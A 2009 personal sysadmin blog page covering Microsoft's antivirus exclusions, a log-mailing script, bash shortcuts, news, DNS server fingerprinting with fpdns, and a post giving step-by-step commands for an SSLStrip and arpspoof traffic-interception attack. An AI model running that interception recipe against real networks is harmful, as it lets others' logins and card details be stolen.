RootAdmin.co.uk

Microsoft’s Virus scanning recommendations – KB822158

by Rootadmin on Dec.29, 2009, under Uncategorized

Microsoft has made recommendations that may help you protect a computer that is running Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, Microsoft Windows 2000, Windows XP, Windows Vista, or Windows 7 from viruses. This article also contains information to help you minimize the effect of antivirus software on system and network performance.

For computers that are running Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, Windows 2000, Windows XP, Windows Vista, or Windows 7

Do not scan the following files and folders. These files are not at risk of infection. If you scan these files, serious performance problems may occur because of file locking. Where a specific set of files is identified by name, exclude only those files instead of the whole folder. Sometimes, the whole folder must be excluded. Do not exclude any one of these based on the file name extension. For example, do not exclude all files that have a .dit extension. Microsoft has no control over other files that may use the same extensions as the following files:

Microsoft Windows Update or Automatic Update related files

The Windows Update or Automatic Update database file. This file is located in the following folder:
%windir%\SoftwareDistribution\Datastore
Exclude the Datastore.edb file.
The transaction log files. These files are located in the following folder:
%windir%\SoftwareDistribution\Datastore\Logs
Exclude the following files:

Edb*.log

Note The wildcard character indicates that there may be several files.
Res1.log. The file is named Edbres00001.jrs for Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2.
Res2.log. The file is named Edbres00002.jrs for Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2.
Edb.chk
Tmp.edb
The following files in the %windir%\security path should be added to the exclusions list:

*.edb
*.sdb
*.log
*.chk

Note If these files are not excluded, security databases are typically corrupted, and Group Policy cannot be applied when you scan the folder. The wildcard character indicates that there may be several files. Specifically, you must exclude the following files:

Edb.chk
Edb.log
*.log
Security.sdb in the <drive>:\windows\security\database folder

Group Policy related files

Group Policy user registry information. These files are located in the following folder:
%allusersprofile%\
Exclude the following file:
NTUser.pol
Group Policy client settings file. These files are located in the following folder:
%Systemroot%\system32\GroupPolicy\
Exclude the following file:
registry.pol

For more information, click the following article numbers to view the articles in the Microsoft Knowledge Base:
951059  (http://support.microsoft.com/kb/951059/ ) On a Windows Server 2003-based computer, registry-based policy settings are unexpectedly removed after a user logs on to the computer
930597  (http://support.microsoft.com/kb/930597/ ) Some registry-based policy settings are lost and error messages are logged in the Application log on a Windows XP-based computer or on a Windows Vista-based computer

For Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, and Windows 2000 domain controllers

Because domain controllers provide an important service to clients, the risk of disruption of their activities from malicious code from a virus must be minimized. Antivirus software is the generally accepted way to lessen the risk of virus infection. Install and configure antivirus software so that the risk to the domain controller is reduced as much as possible and so that performance is affected as little as possible. The following list contains recommendations to help you configure and install antivirus software on a Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, or on a Windows 2000 domain controller:

Warning We recommend that you apply the following specified configuration to a test configuration to make sure that in your specific environment it does not introduce unexpected factors or compromise the stability of the system. The risk from too much scanning is that files are inappropriately flagged as having been changed. This results in too much replication in Active Directory. If testing verifies that replication is not affected by the following recommendations, you can apply the antivirus software to the production environment.

Note Specific recommendations from antivirus software vendors may supersede the recommendations in the article.

Antivirus software must be installed on all domain controllers in the enterprise. Ideally, try to install such software on all other server and client systems that have to interact with the domain controllers. It is optimal to catch the virus at the earliest point, such as at the firewall or at the client system where the virus is first introduced. This prevents the virus from ever reaching the infrastructure systems that the clients depend on.
Use a version of antivirus software that is designed to work with Active Directory domain controllers and that uses the correct Application Programming Interfaces (APIs) to access files on the server. Older versions of most vendor software inappropriately change file metadata as it is scanned. This causes the File Replication Service engine to recognize a file change and therefore schedule the file for replication. Newer versions prevent this problem. For more information, click the following article number to view the article in the Microsoft Knowledge Base:
815263  (http://support.microsoft.com/kb/815263/ ) Antivirus, backup, and disk optimization programs that are compatible with the File Replication service
Do not use a domain controller to browse the Web or to perform any other activities that may introduce malicious code.
When you can, do not use the domain controller as a file sharing server. Virus scanning software must be run against all files in those shares, and this can put an unsatisfactory load on the processor and the memory resources of the server.
Do not put Active Directory or FRS database and log files on NTFS file system compressed volumes.
For more information, click the following article number to view the article in the Microsoft Knowledge Base:
318116  (http://support.microsoft.com/kb/318116/ ) Issues with Jet Databases on compressed drives
Do not scan the following files and folders. These files are not at risk of infection, and if you include them, this may cause serious performance problems because of file locking. Where a specific set of files is identified by name, exclude only those files instead of the whole folder. Sometimes, the whole folder must be excluded. Do not exclude any of these based on the file-name extension. For example, do not exclude all files that have a .dit extension. Microsoft has no control over other files that may use the same extension as those shown here.

Important This section, method, or task contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly. Therefore, make sure that you follow these steps carefully. For added protection, back up the registry before you modify it. Then, you can restore the registry if a problem occurs. For more information about how to back up and restore the registry, click the following article number to view the article in the Microsoft Knowledge Base:
322756  (http://support.microsoft.com/kb/322756/ ) How to back up and restore the registry in Windows

Active Directory and Active Directory-related files:

Main NTDS database files. The location of these files is specified in the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database File
The default location is %windir%\ntds. Exclude the following files:
Ntds.dit
Ntds.pat
Active Directory transaction log files. The location of these files is specified in the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\Database Log Files Path
The default location is %windir%\ntds. Exclude the following files:
EDB*.log (The wildcard character indicates that there may be several files.)
Res1.log (The file is named Edbres00001.jrs for Windows Server 2008, and Windows Server 2008 R2.)
Res2.log (The file is named Edbres00001.jrs for Windows Server 2008, and Windows Server 2008 R2.)
Ntds.pat
Note Windows Server 2003 no longer uses the Ntds.pat file.
The NTDS Working folder that is specified in the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Working Directory
Exclude the following files:
Temp.edb
Edb.chk

SYSVOL files:

The File Replication Service (FRS) Working folder that is specified in the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NtFrs\Parameters\Working Directory
Exclude the following files:
FRS Working Dir\jet\sys\edb.chk
FRS Working Dir\jet\ntfrs.jdb
FRS Working Dir\jet\log\*.log
The FRS Database Log files that are located in the following registry key:
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\NtFrs\Parameters\DB Log File Directory
The default location is %windir%\ntfrs. Exclude the following files:
FRS Working Dir\jet\log\*.log (if the registry key is not set)
FRS Working Dir\jet\log\edbres00001.jrs (Windows Server 2008, and Windows Server 2008 R2)
FRS Working Dir\jet\log\edbres00002.jrs (Windows Server 2008, and Windows Server 2008 R2)
DB Log File Directory\log\*.log (if the registry key is set)
The Staging folder that is specified in the following registry key and all the Staging folder’s sub-folders:
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\NtFrs\Parameters\Replica Sets\GUID\Replica Set Stage

The current location of the Staging folder and all its sub-folders is the file system reparse target of the replica set staging folders. Staging defaults to the following location:

%systemroot%\sysvol\staging areas

The current location of the SYSVOL\SYSVOL folder and all its sub-folders is the file system reparse target of the replica set root. The SYSVOL\SYSVOL folder defaults to the following location:

%systemroot%\sysvol\sysvol
The FRS Preinstall folder that is in the following location:
Replica_root\DO_NOT_REMOVE_NtFrs_PreInstall_Directory
The Preinstall folder is always open when FRS is running.

In summary, the targeted and excluded list of folders for a SYSVOL tree that is placed in its default location would look similar to the following:

1. %systemroot%\sysvol                                                  Exclude
2. %systemroot%\sysvol\domain                                           Scan
3. %systemroot%\sysvol\domain\DO_NOT_REMOVE_NtFrs_PreInstall_Directory  Exclude
4. %systemroot%\sysvol\domain\Policies                                  Scan
5. %systemroot%\sysvol\domain\Scripts                                   Scan
6. %systemroot%\sysvol\staging                                          Exclude
7. %systemroot%\sysvol\staging areas                                    Exclude
8. %systemroot%\sysvol\sysvol                                           Exclude

If any one of these folders or files has been moved or placed in a different location, scan or exclude the equivalent element.

DFS

The same resources that are excluded for a SYSVOL replica set must also be excluded when FRS is used to replicate shares that are mapped to the DFS root and link targets on Windows Server 2008-based, Windows Server 2003-based, or Windows 2000-based member computers or domain controllers.

DHCP

By default, DHCP files that should be excluded are present in the following folder on the server:
%systemroot%\System32\DHCP
Note You should exclude all files and subfolders that exist in this folder.

The location of DHCP files can be changed. To determine the current location of the DHCP files on the server, check the DatabasePath, DhcpLogFilePath, and BackupDatabasePath parameters under the following registry subkey:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\DHCPServer\Parameters

For Windows Server 2008, Windows Server 2003, and Windows 2000 domain controllers

DNS: You should exclude all files and subfolders that exist in the following folder:
%systemroot%\system32\dns
WINS: You should exclude all files and subfolders that exist in the following folder:
%systemroot%\system32\wins
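The exclusions above are only correct if they point at where the databases actually live, and several of them move with a registry value (and one, the FRS log pattern, changes shape depending on whether DB Log File Directory is set). The following is an added example, written for this page and not part of the KB article or of any Microsoft tooling: a Python script that resolves the exclusion list from the registry values the article names and then checks candidate paths against it. The registry read itself is Windows-only, so the values are passed in as a plain dict (on a domain controller you would fill it from the three Parameters keys); the Replica Set Stage value, which is per-GUID in the registry, is modelled as a list of paths; the default locations are the ones the article quotes, and the sample values are constructed.

```python
"""Resolve the KB822158 domain-controller exclusions from the registry values the
article names, then check candidate paths against them.

Added example, not from the article or from Microsoft. The registry read itself is
Windows-only, so the values are passed in as a plain dict; the rest runs anywhere.
"""
import fnmatch
import ntpath
import re

# Default locations quoted in the article; used when a registry value is absent.
DEFAULTS = {
    "ntds": r"%windir%\ntds",
    "ntfrs": r"%windir%\ntfrs",
    "staging": r"%systemroot%\sysvol\staging areas",
    "sysvol": r"%systemroot%\sysvol\sysvol",
    "domain": r"%systemroot%\sysvol\domain",  # replica root of the default SYSVOL tree
    "dhcp": r"%systemroot%\System32\DHCP",
    "dns": r"%systemroot%\system32\dns",
    "wins": r"%systemroot%\system32\wins",
}

# Constructed sample: NTDS relocated to other volumes, FRS DB Log File Directory set.
SAMPLE_REG = {
    "NTDS": {"DSA Database File": r"D:\NTDS\ntds.dit",
             "Database Log Files Path": r"E:\NTDSLogs",
             "DSA Working Directory": r"D:\NTDS"},
    "NtFrs": {"Working Directory": r"%windir%\ntfrs",
              "DB Log File Directory": r"F:\FRSLogs"},
    "DHCPServer": {},
}
SAMPLE_ENV = {"windir": r"C:\Windows", "systemroot": r"C:\Windows"}


def expand(path, env):
    """Expand %name% variables from env (case-insensitive); unknown names are left as-is."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), path)


def resolve_exclusions(reg, env):
    """reg maps service name -> {value name: data} for the NTDS, NtFrs and DHCPServer
    Parameters keys. Returns (kind, pattern) pairs: 'file' is a glob, 'folder' a whole tree."""
    ntds, frs, dhcp = reg.get("NTDS", {}), reg.get("NtFrs", {}), reg.get("DHCPServer", {})
    ex = []

    # Active Directory: DSA Database File names the .dit itself, so take its folder.
    db_file = ntds.get("DSA Database File")
    db_dir = ntpath.dirname(db_file) if db_file else DEFAULTS["ntds"]
    log_dir = ntds.get("Database Log Files Path", DEFAULTS["ntds"])
    work_dir = ntds.get("DSA Working Directory", DEFAULTS["ntds"])
    ex += [("file", ntpath.join(db_dir, f)) for f in ("Ntds.dit", "Ntds.pat")]
    ex += [("file", ntpath.join(log_dir, f)) for f in
           ("EDB*.log", "Res1.log", "Res2.log", "Edbres00001.jrs", "Edbres00002.jrs", "Ntds.pat")]
    ex += [("file", ntpath.join(work_dir, f)) for f in ("Temp.edb", "Edb.chk")]

    # FRS working folder; the log pattern moves when DB Log File Directory is set.
    frs_work = frs.get("Working Directory", DEFAULTS["ntfrs"])
    ex += [("file", ntpath.join(frs_work, "jet", "sys", "edb.chk")),
           ("file", ntpath.join(frs_work, "jet", "ntfrs.jdb"))]
    frs_log = frs.get("DB Log File Directory")
    log_base = ntpath.join(frs_log, "log") if frs_log else ntpath.join(frs_work, "jet", "log")
    ex += [("file", ntpath.join(log_base, f)) for f in ("*.log", "edbres00001.jrs", "edbres00002.jrs")]

    # SYSVOL: every staging folder, SYSVOL\SYSVOL and the pre-install folder, as whole trees.
    ex += [("folder", s) for s in frs.get("Replica Set Stage") or [DEFAULTS["staging"]]]
    ex += [("folder", DEFAULTS["sysvol"]),
           ("folder", ntpath.join(DEFAULTS["domain"], "DO_NOT_REMOVE_NtFrs_PreInstall_Directory"))]

    # DHCP database, log and backup folders, then the DNS and WINS folders, as whole trees.
    dhcp_dirs = {dhcp.get(k, DEFAULTS["dhcp"])
                 for k in ("DatabasePath", "DhcpLogFilePath", "BackupDatabasePath")}
    ex += [("folder", d) for d in sorted(dhcp_dirs)]
    ex += [("folder", DEFAULTS["dns"]), ("folder", DEFAULTS["wins"])]

    return [(kind, expand(p, env)) for kind, p in ex]


def is_excluded(path, exclusions):
    """True if path matches a file glob or lies under an excluded folder (case-insensitive)."""
    p = path.lower()
    for kind, pat in exclusions:
        pat = pat.lower()
        if kind == "file" and fnmatch.fnmatchcase(p, pat):
            return True
        if kind == "folder" and (p == pat or p.startswith(pat + "\\")):
            return True
    return False


if __name__ == "__main__":
    for kind, pat in resolve_exclusions(SAMPLE_REG, SAMPLE_ENV):
        print(f"{kind:6} {pat}")
```

With the sample values the script lists the NTDS files under D:\ and E:\ rather than %windir%\ntds, and the FRS *.log pattern under F:\FRSLogs\log instead of the jet\log folder; the summary table's rule that SYSVOL\domain\Policies is scanned while SYSVOL\sysvol is excluded falls out of the folder checks. Compare its output with the exclusion list actually configured in the antivirus console, and re-run it after any NTDS or FRS relocation.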

You can get more info here

http://support.microsoft.com/kb/822158


Bash shell keyboard shortcuts

by Rootadmin on Dec.10, 2009, under Uncategorized

Here is a list of some bash keyboard shortcuts you may or may not find useful.

Alt + B     Move cursor backward one word on the current line
Alt + F     Move cursor forward one word on the current line
Ctrl + A     Go to the beginning of the line you are currently typing on
Ctrl + C     Kill whatever you are running
Ctrl + D     Exit the current shell
Ctrl + E     Go to the end of the line you are currently typing on
Ctrl + H     Same as backspace
Ctrl + K     Clear the line after the cursor
Ctrl + L     Clears the Screen, similar to the clear command
Ctrl + U     Clears the line before the cursor position. If you are at the end of the line, clears the entire line.
Ctrl + R     Lets you search through previously used commands
Ctrl + T     Swap the last two characters before the cursor
Ctrl + W     Delete the word before the cursor
Ctrl + Z     Puts whatever you are running into a suspended background process. fg restores it.
Esc + T     Swap the last two words before the cursor
Tab         Auto-complete files and folder names


Linux : Automatically send logs daily

by Rootadmin on Dec.09, 2009, under Linux, Other

Well, below is my first attempt at a shell script; firstly, understand I am no programmer!

Before we look at it, my server is running OPENVPN and Uncomplicated Firewall (I’m running Ubuntu Server).

So how does it work?

Firstly we declare that we are using the bash shell using
#!/bin/bash

Next we set up some variables. The first simply formats the date and stores it as TODAYSDATE;
next we set today’s archive name to archive.TODAYSDATE and store it as TODAYS_ARCHIVE.

Next we create a directory called archive.TODAYSDATE.

Now to the best bit, we start processing the logs:
- We extract today’s logs out of syslog
- From the extracted logs we extract the firewall (Uncomplicated Firewall / UFW) logs to a separate file
- Now extract today’s messages log
- From today’s extracted logs extract all OPENVPN related logs to a separate log file
- Extract today’s apache access.log and error.log
- Provide us with the currently running processes
- Zip it all up to the /archive/ folder
- Back up a directory level and delete the folder called archive.TODAYSDATE
- Now use mutt to attach the zip file to an email and send it

Now for the script – PLEASE FEEL FREE TO USE

#!/bin/bash
# Script By Liam Somerville, www.rootadmin.co.uk
# Use freely

#####################################################################
#                        Set up the variables
#####################################################################
# Set today's date
TODAYSDATE=$(date +"%d-%b-%Y")

# Format archive name
TODAYS_ARCHIVE="archive.$TODAYSDATE"

# Date stamps used to pick today's lines out of each log format:
# syslog space-pads the day of month (%e), Apache zero-pads it (%d)
SYSLOG_DATE=$(date +"%b %e")
APACHE_ERROR_DATE=$(date +"%b %d")
APACHE_ACCESS_DATE=$(date +"%d/%b")

#####################################################################
#                    Finished setting up Variables
#
#                   Now start processing the log files
#####################################################################

# Make a directory called archive with today's date and change to that directory
# (stop here if that fails, so the rm -r at the end never runs in the wrong place)
mkdir "$TODAYS_ARCHIVE"
cd "$TODAYS_ARCHIVE" || exit 1

# Write the log files
# Archive today's syslog, extract all firewall related logs to firewall, then
# extract messages
grep "$SYSLOG_DATE" /var/log/syslog > "syslog.$TODAYSDATE"
grep UFW "syslog.$TODAYSDATE" > "firewall_log.$TODAYSDATE"
grep "$SYSLOG_DATE" /var/log/messages > "messages.$TODAYSDATE"
# Process the OpenVPN server logs
grep "ovpn-server" "syslog.$TODAYSDATE" > "vpn_server_log.$TODAYSDATE"
#
# Process Apache logs
grep "$APACHE_ERROR_DATE" /var/log/apache2/error.log > "apache_error_log.$TODAYSDATE"
grep "$APACHE_ACCESS_DATE" /var/log/apache2/access.log > "apache_access_log.$TODAYSDATE"
#
# Process FTP logs
grep "$SYSLOG_DATE" /var/log/vsftpd.log > "ftp_log.$TODAYSDATE"
#
# Get a list of currently running processes
ps aux > "Processes.$TODAYSDATE"

# Zip up all the logs into /archive and delete today's working folder
mkdir -p /archive
zip "/archive/$TODAYS_ARCHIVE.zip" ./*
cd ..
rm -r "$TODAYS_ARCHIVE"

####################################################################
#                     Now email the zip file
###################################################################
echo | mutt -a "/archive/$TODAYS_ARCHIVE.zip" -s "Event logs for $TODAYSDATE" -- you@your.email.address.com
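The part of that script that is easiest to get wrong is the date match: syslog writes a single-digit day with a leading space ("Dec  9"), the Apache error log zero-pads it ("Dec 09") and the access log uses day/month ("09/Dec"), which is why the script has to use %e for one and %d for the others, and a plain grep for the date also matches a line from another day whose message merely mentions that date. The following is an added example, written for this page and not the post's script: a Python version of the same per-day extraction with the date stamp anchored where each format actually writes it. The log lines are constructed for the demonstration (RFC 5737 addresses).

```python
"""Pick one day's entries out of the log formats the archive script greps, with the
day stamp anchored where each format actually writes it.

Added example, not the post's script; the log lines below are constructed.
"""
import re
from datetime import date

MONTHS = ["Jan", "Feb", "Mar", "Apr", "May", "Jun",
          "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]  # fixed table, so the locale cannot change it

SAMPLE_DAY = date(2009, 12, 9)  # the day the sample archive is built for

# Constructed sample logs; the last syslog line is a decoy from the next day that
# mentions "Dec  9" in its message text and must not be picked up.
SAMPLE_LOGS = {
    "syslog": [
        "Dec  8 23:59:58 vps kernel: [UFW BLOCK] IN=eth0 OUT= SRC=198.51.100.7 DST=203.0.113.5 PROTO=TCP DPT=22",
        "Dec  9 00:00:12 vps kernel: [UFW BLOCK] IN=eth0 OUT= SRC=198.51.100.7 DST=203.0.113.5 PROTO=TCP DPT=23",
        "Dec  9 00:01:05 vps ovpn-server[1234]: 198.51.100.20:1194 TLS: Initial packet from [AF_INET]198.51.100.20:1194",
        "Dec  9 06:25:01 vps CRON[2345]: (root) CMD (test -x /usr/sbin/anacron || run-parts --report /etc/cron.daily)",
        "Dec 10 00:00:01 vps logrotate[3456]: rotated syslog, last entry was Dec  9 23:59:59",
    ],
    "apache_error": [
        "[Tue Dec 08 23:59:59 2009] [error] [client 198.51.100.9] File does not exist: /var/www/favicon.ico",
        "[Wed Dec 09 00:00:03 2009] [notice] Apache/2.2.12 (Ubuntu) configured -- resuming normal operations",
        "[Wed Dec 09 10:15:22 2009] [error] [client 198.51.100.9] File does not exist: /var/www/phpmyadmin",
    ],
    "apache_access": [
        '198.51.100.9 - - [08/Dec/2009:23:59:59 +0000] "GET /index.html HTTP/1.1" 200 612',
        '198.51.100.9 - - [09/Dec/2009:00:00:10 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 485',
        '198.51.100.9 - - [09/Dec/2009:10:15:22 +0000] "GET /admin/ HTTP/1.1" 404 481',
    ],
}


def day_pattern(fmt, d):
    """Compile the anchored date stamp each log format writes for day d."""
    mon = MONTHS[d.month - 1]
    if fmt == "syslog":         # "Dec  9 00:00:12 host ..."         (date +"%b %e")
        return re.compile(rf"^{mon} {d.day:2d} ")
    if fmt == "apache_error":   # "[Wed Dec 09 00:00:03 2009] ..."   (date +"%b %d")
        return re.compile(rf"^\[\w{{3}} {mon} {d.day:02d} ")
    if fmt == "apache_access":  # "... [09/Dec/2009:00:00:10 +0000] ..." (date +"%d/%b")
        return re.compile(rf"\[{d.day:02d}/{mon}/")
    raise ValueError(f"unknown log format: {fmt}")


def entries_for_day(lines, fmt, d):
    """Lines of one log written on day d, like the script's first-stage grep."""
    pat = day_pattern(fmt, d)
    return [ln for ln in lines if pat.search(ln)]


def select(lines, needle):
    """Second-stage filter, like the script's grep UFW / grep ovpn-server."""
    return [ln for ln in lines if needle in ln]


def build_archive(logs, d):
    """Produce the same per-day files the script writes, as an in-memory dict."""
    syslog = entries_for_day(logs["syslog"], "syslog", d)
    return {
        "syslog": syslog,
        "firewall_log": select(syslog, "UFW"),
        "vpn_server_log": select(syslog, "ovpn-server"),
        "apache_error_log": entries_for_day(logs["apache_error"], "apache_error", d),
        "apache_access_log": entries_for_day(logs["apache_access"], "apache_access", d),
    }


if __name__ == "__main__":
    for name, lines in build_archive(SAMPLE_LOGS, SAMPLE_DAY).items():
        print(f"{name}: {len(lines)} line(s)")
```

On the sample data this yields three syslog lines for 9 Dec (one UFW block, one OpenVPN entry, one cron run), two Apache error lines and two access lines, and leaves the 10 Dec logrotate line out even though its text contains "Dec  9"; the unanchored grep in the script would have included it.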


Tesco to sell iPhone on Tesco Mobile

by Rootadmin on Nov.27, 2009, under Uncategorized

Tesco Mobile through its joint venture partnership with O2 is pleased to announce that it will shortly introduce iPhone 3G and iPhone 3GS in Tesco Phone Shops and online through Tesco Direct in the UK.

For further information and for customers interested in pre-registration please visit http://www.tescomobileiphone.com/.

For more information on iPhone, please visit www.apple.com/uk/iphone.

More information can be found on Tesco Mobile at http://www.tescomobile.com/

About Tesco Mobile:

Tesco Mobile is a 50:50 joint venture between Tesco and O2. The company sells exclusively Tesco Mobile branded services in Tesco stores, online and through Tesco Direct, across the UK using O2’s technology and network.

Tesco Mobile is also available in the rapidly expanding estate of Tesco Phone Shops which will number over 100 by the end of 2009.

The network gives its customers value, simplicity and choice, offering them award winning, simple, great value Pay as you go and Pay monthly tariffs with rewards such as free credit and Clubcard points.

It is the fastest growing Pay as you go network in 2009 and has been voted as the number one mobile network for customer satisfaction by Which Magazine (May 09).


UK 3 Strikes law petition

by Rootadmin on Nov.24, 2009, under Uncategorized

Following the decision of the European Parliament that enables European member states to approve laws that force ISPs to disconnect individuals from the Internet, the UK is planning on enforcing its own version of the “three-strikes” law meant to discourage illegal file sharing.

According to The Guardian, Lord Peter Mandelson, the Business Secretary, announced that this law is supposed to become reality in 2011. It will go through a 12-month-long testing phase that will see warning letters sent to persistent offenders. If the scope of the illegal activity doesn’t drop by at least 70 percent by April 2011, three months later the practice of cutting off Internet access will be set in motion.

There were a lot of voices raised against this plan. ISPs don’t want the responsibility – it’s bad for their public image, and also raises operational costs. The Open Rights Group sees it as an infringement of basic rights. Times Online reports that even UK’s law enforcement and intelligence services are against it. They fear that pirates will begin to use encryption and thus make their job even harder (not to mention the increase of workload and costs).

On the opposite side sit the music and movie industries. They are, of course, anxious to see the law in practice since they “lose” hundreds of millions of pounds every year.

SIGN THE PETITION http://petitions.number10.gov.uk/dontdisconnectus/ – UK Citizens only


Fingering DNS Servers in ubuntu

by Rootadmin on Nov.21, 2009, under Uncategorized

Install fpdns in Ubuntu

sudo aptitude install fpdns

This will complete the installation.

Using fpdns

fpdns [-c] [-d] [-f] [-p port] [-Q srcaddr] [-r retry] [-s] [-t timeout] [-v] server

Where: server is an ip address or a resolvable name
or '-' to read list of servers from stdin
-c (where appropriate check CH TXT version) [off]
-d (debug) [off]
-f (force check CH TXT version) [off]
-F (maximum forked processes) [10]
-p port (nameserver is on this port) [53]
-Q srcaddr (source IP address) [0.0.0.0]
-r retry (set number of attempts) [1]
-s (short form) [off]
-t time (set query timeout) [5]
-v (show version)

fpdns Examples

BIND Version 8 Example

fpdns -D google.com

fingerprint (google.com, 216.239.34.10): ISC BIND 8.3.0-RC1 -- 8.4.4
fingerprint (google.com, 216.239.36.10): ISC BIND 8.3.0-RC1 -- 8.4.4
fingerprint (google.com, 216.239.38.10): ISC BIND 8.3.0-RC1 -- 8.4.4
fingerprint (google.com, 216.239.32.10): ISC BIND 8.3.0-RC1 -- 8.4.4

BIND Version 9 Example

fpdns -D debianhelp.co.uk

fingerprint (debianhelp.co.uk, 212.67.202.2): ISC BIND 9.2.3rc1 -- 9.4.0a0 [recursion enabled]
fingerprint (debianhelp.co.uk, 212.67.203.246): ISC BIND 9.2.3rc1 -- 9.4.0a0 [recursion enabled]

TinyDNS Example

fpdns ns1.eu.dedicatedserver.com.

fingerprint (ns1.eu.dedicatedserver.com., 213.198.65.226): DJ Bernstein TinyDNS 1.05

Microsoft Windows 2003 Example

fpdns -D microsoft.com

fingerprint (microsoft.com, 207.68.160.190): Microsoft Windows DNS 2003
fingerprint (microsoft.com, 65.54.240.126): Microsoft Windows DNS 2003


View SSL Traffic

by Rootadmin on Nov.12, 2009, under Other

SSLStrip will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

How does this work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.

Requirements

  • Python >= 2.4 (apt-get install python)
  • The python “twisted-web” module (apt-get install twisted-web)

Setup

  • wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz
  • tar zxvf sslstrip-0.6.tar.gz
  • cd sslstrip-0.6
  • (optional) sudo python ./setup.py install

Running sslstrip

  • Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
  • Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)
  • Run sslstrip. (sslstrip.py -l <listenPort>)
  • Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)

That should do it.

- http://www.thoughtcrime.org/software/sslstrip/


New vpn server

by Rootadmin on Nov.12, 2009, under Uncategorized

Well, as some of you may know, it is possible to sniff SSL traffic on a network and capture things like usernames, passwords and even credit card details.

In response to this I (with some considerable help from YaManicKill -http://www.10people.co.uk/) have created a vpn server for my wife and I, her family and my family and YaManicKill to use to help combat this issue.

We leased a VPS box in a datacentre so the connection is fast (instead of hosting the server at a house on an ADSL line). It’s been a bit of a mission setting it up, but we got there in the end.

RootAdmin.co.uk may move host to the VPS box, but at this moment in time this is just an idea.


Subnetting and networking

by Rootadmin on Oct.10, 2009, under Uncategorized

Well, since I changed my career into IT Security in November 2008 I haven’t done much in the way of networking or subnetting.

Today I surprised myself: I can still subnet in my head. I was asked by one of the guys from another team if I knew what a /25 subnet was, and off the top of my head, before I even stood to try and work it out, the answer had left my mouth.

Quite impressed with myself.

Heads up: Juniper are offering free exams at the moment. Think I might do that. We will see.


O2 broadband dictatorship to employ “Traffic Management”

by Rootadmin on Oct.07, 2009, under Other

O2 are going to employ a new “traffic management” system on its broadband facilities.

Between the hours of 8PM and 11PM customers will notice that the following traffic is restricted and will run slower:

File-sharing:

  • BitTorrent
  • Blubster
  • Gnutella
  • KaZaA
  • WinMX_6688
  • WinMX_6699
  • eDonkey
  • Filetopia
  • eDonkey_UDP
  • Hotline
  • Hotline_1234
  • DirectConnect
  • GuruGuru
  • Soribada
  • Soulseek
  • Ares
  • Rodi
  • JoltID
  • eMule_UDP
  • Waste
  • Konspire2b
  • ExoSee
  • FurthurNet
  • MUTE
  • GNUnet
  • Nodezilla

Newsgroups:

  • NNTP
  • NNTPS
  • TAC_News
  • Audio_News
  • NTalk
  • NetNews
  • NAS
  • DDI
  • Giganews

The problem I see with this is that a lot of legitimate traffic in the Linux community is over BitTorrent; a lot of applications are distributed over torrents.

Yet again another O2 business dictates its ruling, stuff their customers. HERE’S A NEW IDEA: UPGRADE YOUR NETWORK.

O2 currently have only 400,000 customers, so how come other ISPs manage just fine? Yet another reason why O2 will not see any of my business; I’m just fed up with their dictatorship!

Full O2 ruling here http://broadband.o2.co.uk/home/traffic.jsp

